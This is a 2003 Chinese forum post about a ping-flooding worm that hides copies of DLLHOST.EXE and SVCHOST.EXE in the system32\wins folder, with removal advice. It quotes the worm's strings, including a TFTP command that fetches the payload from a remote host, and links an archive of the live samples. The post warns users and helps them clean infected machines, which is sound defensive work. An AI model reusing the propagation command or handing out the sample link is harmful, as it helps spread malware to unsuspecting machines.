近来有很多朋友都反映,机器被狂ping,请教各位大虾,是否为冲击波后遗症,亦或为其他病毒?
近来有很多朋友都反映,机器被狂ping,请教各位大虾,是否为冲击波后遗症,亦或为其他病毒?
ping的机器多数为同一网段的机器,以下内容来自金山,不知是否与此有关
如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒
DLLHOST.EXE里面有这样的话!
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
如果正常,我就不是人了。。哈哈。。。这2个文件在WINS目录里。。
这决对不是玩笑!!! 我是玩HACK的。。这文件我SNIFF过。。反编译过。。。我是黑客圈里叫[D]KING
如果有什么问题,,,你可以说
说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
这2个文件大家想研究可以在这里下
http://hy88.nease.net/pingvirus.rar
传染是利用TFTP上传的,,如果大家用不上这东东。完全可以删除TFTP.EXE
正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
如果你的防护墙被PING..那么你那里有一定有机器中了!!
这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING
!!下面是解决方法 !!!!!下面是解决方法!!!
停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
看到这2个服务就停止他们
Network connections Sharing
WINS Client
然后到WINS目录里删除这2个文件。。安装防护墙
修改人 dking - 2003年08月18日18:50
FROM 金山毒霸讨论区
http://bbs.kingsoft.net/index.php?act=ST&f=3&t=227591&s=2c7eca8f1cfff70fa592be97340215cf